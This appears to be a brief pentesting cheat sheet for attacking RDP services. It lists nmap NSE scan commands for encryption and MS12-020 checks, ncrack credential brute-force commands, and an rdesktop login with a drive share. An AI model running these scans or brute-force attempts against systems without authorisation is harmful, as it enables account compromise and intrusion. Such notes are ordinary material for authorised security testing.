# Using nmap NSE scripts
nmap -Pn -sV --version-intensity=5 -p T:3389 --script=xxxx <IP>
# Determines which Security layer and Encryption level is supported by the RDP service
rdp-enum-encryption
# Checks if a machine is vulnerable to MS12-020 RDP vulnerability
rdp-vuln-ms12-020.nse
Credentials bruteforce
# Using ncrack for one user
ncrack -vv -u nina -P passwords.txt rdp://IP
# Using ncrack for several users
ncrack -vv -U users.txt -P passwords.txt rdp://IP
Connexion
# Using rdesktop
rdesktop -u "username" -p "password" -g 80% -r disk:share=/path/to/share/with/remote/host <IP>
# Remmina is cool too